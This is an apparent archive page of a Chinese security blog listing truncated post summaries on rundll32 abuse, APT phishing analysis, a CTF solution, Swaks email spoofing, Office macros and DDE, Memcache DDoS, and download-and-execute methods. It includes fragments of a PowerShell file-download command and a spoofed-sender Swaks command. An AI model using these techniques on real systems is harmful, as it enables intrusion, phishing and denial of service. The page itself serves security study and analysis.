03 2018 档案
摘要:1、前言 无意间发现hexacorn这个国外大佬,给出了很多通过rundll32执行DLL中的函数执行程序的方法,思路很灵巧。 2、原理 rundll32加载dll 用法: 参数代表传入dll的导出函数名,在dll中定义如下: 参数对应dll导出函数中的LPSTR lpszCmdLine 也就是说通
阅读全文
摘要:1、前言 在2016年左右研究人员发现一个与东南亚和中国南海问题的APT攻击,该APT攻击利用MS Offcie系列漏洞通过钓鱼邮件的形式欺骗受害者点击木马。以美国在内的各国政府和公司为目标发送了大量的恶意代码样本 。 其中木马上线的方式是利用了白名单网站的方式。攻击者将控制端的IP地址加密后发表文
阅读全文
摘要:Reverseme 用winhex打开,发现里面的字符反过来可以正常阅读,所以文件被倒置了 Python解题程序如下 with open('reverseMe','rb') as f: with open('flag','wb') as g: g.write(f.read()[::-1]) 将获取的
阅读全文
摘要:1、 前言 在kali中自带一个邮件伪造工具Swaks,工具项目主页为 http://jetmore.org/john/code/swaks 2、基本用法: swaks to from ehlo body header swaks to xxxx@qq.com from info@freebuf.c
阅读全文
摘要:1、Office Macor MS office宏的编程语言是Visual Basic For Applications(VBA)。 微软在1994年发行的Excel5.0版本中,即具备了VBA的宏功能。开发目的是为了在其桌面应用程序中执行通用的自动化任务,用于扩展Windows的应用程序功能。在分
阅读全文
摘要:1、利用防火墙命令放行自身手法 2、排查方法 3、参考 windows下查看防火墙状态命令netsh firewall ,开启防火墙与关闭防火墙 http://beikeit.com/post 770.html
阅读全文
摘要:1、前言 2月28日,Memcache服务器被曝出存在UDP反射放大攻击漏洞。攻击者可利用这个漏洞来发起大规模的DDoS攻击,从而影响网络正常运行。漏洞的形成原因为Memcache 服务器UDP 协议支持的方式不安全、默认配置中将 UDP 端口暴露给外部链接。 2、原理分析 这个漏洞的攻击方式属于D
阅读全文
摘要:1、前言 要在Internet上提供电子邮件功能,必须有专门的电子邮件服务器。通过邮件钓鱼行为进行投递是一种较为主流的方式,通过对流量的抓包总有些异常的情况。 2、邮件传输协议基础 2.1、SMTP协议 用户连接上邮件服务器之后,要想给它发送一封电子邮件,需要遵循一定的通讯规则,SMTP协议就是用来
阅读全文
摘要:1、前言 在渗透或是病毒分析总是会遇到很多千奇百怪的下载文件和执行命令的方法。 2、实现方式 2.1、Powershell win2003、winXP不支持 $client = new-object System.Net.WebClient $client.DownloadFile(‘http://
阅读全文
摘要:1、前言 2017年下半年爆发出来的Office漏洞,一直没有空做笔记记录。在病毒分析中也看到有利用这个漏洞的样本,针对Office系列软件发起的钓鱼攻击和APT攻击一直是安全攻防的热点。 2、office DDE Microsoft Office Word 的一个执行任意代码的方法,可以在不启用宏
阅读全文

浙公网安备 33010602011771号